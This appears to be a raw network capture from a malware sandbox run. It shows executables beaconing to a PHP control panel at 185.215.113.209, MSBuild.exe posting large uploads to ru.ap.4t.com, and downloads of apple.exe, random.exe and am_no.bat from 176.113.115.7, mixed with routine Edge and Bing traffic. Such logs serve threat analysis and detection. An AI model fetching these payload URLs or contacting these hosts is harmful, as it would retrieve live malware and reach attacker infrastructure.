Date: Sat, 29 Mar 2025 01:30:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:31:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----e3opzu3o8glnymycbsr9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 76925
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----aaieuknglfcbimyusrqi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 311757
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://176.113.115.7/files/newdef/apple.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/newdef/apple.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 23:33:49 GMT
ETag: "51e6d-6314744ebb140"
Accept-Ranges: bytes
Content-Length: 335469
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/test/exe/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /test/exe/random.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 00:37:12 GMT
ETag: "eaa00-63170634e6d19"
Accept-Ranges: bytes
Content-Length: 961024
Content-Type: application/x-msdos-program
GET

http://176.113.115.7/test/am_no.bat

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /test/am_no.bat HTTP/1.1
Host: 176.113.115.7
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239355235432_11K71SSHV5QGQD37N&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239355235432_11K71SSHV5QGQD37N&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 403119
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 127CE39EFF864500AE4E7B6E225B2A2F Ref B: LON04EDGE1218 Ref C: 2025-03-29T01:30:34Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340417880_1PRMSECURT9IUDN7Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340417880_1PRMSECURT9IUDN7Q&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 363894
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D455EF9690BD41BF9822027F3921E681 Ref B: LON04EDGE1218 Ref C: 2025-03-29T01:30:34Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360615987_16QLWX2YIZJRGGD7R&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360615987_16QLWX2YIZJRGGD7R&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 502729
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EDFC1510DC8A4D478DE75854AB89A14B Ref B: LON04EDGE1218 Ref C: 2025-03-29T01:30:34Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239355235433_11OUP2PBME21J4MUN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239355235433_11OUP2PBME21J4MUN&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 258855
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 61C5B80981CE4BDB9FA3939B21C67E14 Ref B: LON04EDGE1218 Ref C: 2025-03-29T01:30:34Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360615986_1M5N6Y5ACPFWCCI4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239360615986_1M5N6Y5ACPFWCCI4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 305259
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8AB8949A0EB34E92BE62D237330C0208 Ref B: LON04EDGE1218 Ref C: 2025-03-29T01:30:34Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418534_1SATV94N425TECTRU&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239340418534_1SATV94N425TECTRU&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 473680
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 95B3E4478E2A4BBF8EE371496EFAE720 Ref B: LON04EDGE1218 Ref C: 2025-03-29T01:30:42Z
date: Sat, 29 Mar 2025 01:30:41 GMT
DNS

edge.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN A

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net

ax-0002.ax-msedge.net

IN A

150.171.27.11

ax-0002.ax-msedge.net

IN A

150.171.28.11
DNS

edge.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN Unknown

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net
DNS

ntp.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ntp.msn.com

IN A

Response

ntp.msn.com

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net

a-0003.a-msedge.net

IN A

204.79.197.203
DNS

ntp.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ntp.msn.com

IN Unknown

Response

ntp.msn.com

IN CNAME

www-msn-com.a-0003.a-msedge.net

www-msn-com.a-0003.a-msedge.net

IN CNAME

a-0003.a-msedge.net
DNS

edge.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN A

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net

ax-0002.ax-msedge.net

IN A

150.171.27.11

ax-0002.ax-msedge.net

IN A

150.171.28.11
DNS

edge.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN Unknown

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

172.217.16.238
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN Unknown

Response

clients2.google.com

IN CNAME

clients.l.google.com
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D0.0.0.0%26installedby%3Dexternal%26uc

msedge.exe

Remote address:

172.217.16.238:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromiumcrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D0.0.0.0%26installedby%3Dexternal%26uc HTTP/2.0
host: clients2.google.com
x-goog-update-interactivity: fg
x-goog-update-appid: ghbmnnjooekpmoecnnnilnnbdlolhkhi
x-goog-update-updater: chromiumcrx-133.0.3065.69
ms-cv: OM8qOiearZzCv11uF3jXZ9
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=1, i
GET

http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:L2ViFaIONDkwbcrd2Qmgq6RzCoYlHCQHA5Z7og9kRds&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

msedge.exe

Remote address:

150.171.27.11:80

Request

GET /browsernetworktime/time/1/current?cup2key=2:L2ViFaIONDkwbcrd2Qmgq6RzCoYlHCQHA5Z7og9kRds&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 HTTP/1.1
Host: edge.microsoft.com
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Sec-Mesh-Client-Edge-Version: 133.0.3065.69
Sec-Mesh-Client-Edge-Channel: stable
Sec-Mesh-Client-OS: Windows
Sec-Mesh-Client-OS-Version: 10.0.19041
Sec-Mesh-Client-Arch: x86_64
Sec-Mesh-Client-WebView: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 101
Content-Type: application/json
Content-Encoding: gzip
Expires: Mon, 01 Jan 1990 00:00:00 GMT
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
x-cup-server-proof: 3045022002061476B546E095EB3A6B22E924A37E1B62B8D869008B72B0530C2EFF0C86A1022100C19395CFE8B4C55A6A03BCA3CA7300EF7672AD5C05E721D2F6873E380C82006D:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Content-Disposition: attachment; filename='json.txt'
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: BD4E3E0E71DA4573878F6CE2975E5EAF Ref B: LON04EDGE1221 Ref C: 2025-03-29T01:30:33Z
Date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19041&devicefamily=desktop&installdate=1741933579&clientversion=133.0.3065.69&experimentationmode=2&scpguard=0&scpfull=0&scpver=0

msedge.exe

Remote address:

150.171.27.11:443

Request

GET /serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19041&devicefamily=desktop&installdate=1741933579&clientversion=133.0.3065.69&experimentationmode=2&scpguard=0&scpfull=0&scpver=0 HTTP/2.0
host: edge.microsoft.com
pragma: no-cache
cache-control: no-cache
sec-mesh-client-edge-version: 133.0.3065.69
sec-mesh-client-edge-channel: stable
sec-mesh-client-os: Windows
sec-mesh-client-os-version: 10.0.19041
sec-mesh-client-arch: x86_64
sec-mesh-client-webview: 0
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-length: 916
content-type: application/json; charset=utf-8
content-security-policy: base-uri 'self';block-all-mixed-content;default-src 'self';img-src 'self';object-src 'none';script-src 'none';style-src 'self';upgrade-insecure-requests;
x-cache: CONFIG_NOCACHE
x-msedge-ref: Ref A: 1D97E964274749D9A84560E8151A7AF6 Ref B: LON04EDGE0920 Ref C: 2025-03-29T01:30:33Z
date: Sat, 29 Mar 2025 01:30:32 GMT
DNS

copilot.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

copilot.microsoft.com

IN A

Response

copilot.microsoft.com

IN CNAME

copilot-copilot-msft-com.trafficmanager.net

copilot-copilot-msft-com.trafficmanager.net

IN CNAME

copilot.microsoft.com.edgekey.net

copilot.microsoft.com.edgekey.net

IN CNAME

e107108.dscx.akamaiedge.net

e107108.dscx.akamaiedge.net

IN A

95.101.143.218

e107108.dscx.akamaiedge.net

IN A

88.221.135.26
DNS

copilot.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

copilot.microsoft.com

IN Unknown

Response

copilot.microsoft.com

IN CNAME

copilot-copilot-msft-com.trafficmanager.net

copilot-copilot-msft-com.trafficmanager.net

IN CNAME

copilot.microsoft.com.edgekey.net

copilot.microsoft.com.edgekey.net

IN CNAME

e107108.dscx.akamaiedge.net
GET

https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531 HTTP/2.0
host: ntp.msn.com
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0.0"
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"imageAndVideo","dsp":1,"en_widget_reg":false,"exp":["msAllowThemeInstallationFromChromeStore","msUndersideAutoOpenForMsnTopQuestion","msNurturingMetadataTemplate","msNurturingOnboardNTPToCE"],"feed_dis":"peek","layout":1,"quick_links_opt":1,"seen_new_dev_fre":false,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=0, i

Response

HTTP/2.0 200

cache-control: no-store, no-cache
pragma: no-cache
content-length: 49691
content-type: text/html; charset=utf-8
set-cookie: _C_ETH=1; domain=.msn.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: sptmarket=en-US||gb|en-gb|en-gb|en||cf=8|RefA=583592B502F9469CBA059551F752EDAF.RefC=2025-03-29T01:30:33Z; expires=Mon, 29 Mar 2027 01:30:33 GMT; path=/
set-cookie: USRLOC=; expires=Mon, 29 Mar 2027 01:30:33 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly
set-cookie: MUID=1BCC9635343F60E02399838B3518610E; expires=Thu, 23 Apr 2026 01:30:33 GMT; domain=.msn.com; path=/; secure; samesite=none
set-cookie: MUIDB=1BCC9635343F60E02399838B3518610E; expires=Thu, 23 Apr 2026 01:30:33 GMT; path=/; httponly
set-cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8; domain=.msn.com; path=/; httponly
set-cookie: _EDGE_V=1; expires=Thu, 23 Apr 2026 01:30:33 GMT; domain=.msn.com; path=/; httponly
access-control-allow-methods: HEAD,GET,OPTIONS
content-security-policy: child-src 'self';connect-src 'self' *.mavideo.microsoft.com arc.msn.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn browser.events.data.msn.com browser.events.data.msn.cn browser.events.data.microsoftstart.com browser.events.data.microsoftstart.cn business.bing.com/api/ usgov.business.bing.com/api/ cdn.hubblecontent.osi.office.net copilotexplore.azurewebsites.net events-sandbox.data.msn.com events-sandbox.data.msn.cn events-sandbox.data.microsoftstart.com events-sandbox.data.microsoftstart.cn finance-services.msn.com https://*.sharepoint.com/_api/v2.0/ https://*.sharepoint-df.com/_api/v2.0/ https://*.sharepoint.com/_api/v2.1/ https://*.sharepoint-df.com/_api/v2.1/ https://bingretailmsndata.azureedge.net/msndata/ https://browser.pipe.aria.microsoft.com/Collector/ https://dev.virtualearth.net/REST/v1/Imagery/ https://dev.ditu.live.com/REST/v1/Imagery/ https://ecn.dev.virtualearth.net https://jsconfig.adsafeprotected.com https://g.bing.com https://msx.bing.com https://petrol.office.microsoft.com/v1/feedback https://privacyportal.onetrust.com/request/v1/consentreceipts https://sapphire.api.microsoftapp.net https://services.bingapis.com https://substrate.office.com/PeoplePredictionsB2/StreamsPreview https://substrate.office.com/PeoplePredictionsB2/StreamsPreviewById https://substrate.office.com/autodiscover/ https://trafficanswer.trafficmanager.net https://*.clarity.ms https://edge.microsoft.com/edgedeeplearning/ img-s-msn-com.akamaized.net img-s.msn.cn login.microsoftonline.com notification.services.msn.com ocws.officeapps.live.com/ocs/ ocws-eu.officeapps.live.com/ocs/ odc.officeapps.live.com/odc/ prod-video-cms-amp-microsoft-com.akamaized.net r.bing.com/rp/rms_pr.png raka.bing.com/rp/rms_pr.png ris.api.iris.microsoft.com srtb.msn.com srtb.msn.cn srtb-pulsar.msn.com substrate.office.com/FocusedInboxB2/api/v1/ substrate.office.com/PeoplePredictionsB2/graphql substrate.office.com/PeoplePredictionsB2/MeTaPreview substrate.office.com/PeoplePredictionsB2/SPImageProxied substrate.office.com/PeoplePredictionsB2/SpPreview substrate.office.com/api/beta/me/WorkingSetFiles substrate.office.com/api/beta/me/officegraphinsights/trending substrate.office.com/recommended/api/beta/edgeworth/ substrate.office.com/api/v2.0/ substrate.office.com/peoplepredictionsb2/feedback substrate.office.com/peoplepredictionsb2/microsoftfeed substrate.office.com/recommended/api/v1.0/files substrate.office.com/search/api/v1/ substrate.office.com/todo/api/v1/ substrate.office.com/todob2/api/v1/ th.bing.com/th webshell.suite.office.com/api/shell/newtab wss://www.bing.com/opaluqu/speech/recognition/interactive/cognitiveservices/ wss://sr.bing.com/opaluqu/speech/recognition/interactive/cognitiveservices/ www.bing.com/fd/ls/ls.gif www.msn.com www.msn.cn www.microsoftstart.com cn.bing.com/api/ cn.bing.com/bnc/ cn.bing.com/pnp/ cn.bing.com/profile/interestmanager/update *.cn.mm.bing.net *.mm.cn.bing.net *.tc.mm.bing.net www.bing.com/HPImageArchive.aspx www.bing.com/api/custom/opal/reco/ www.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn 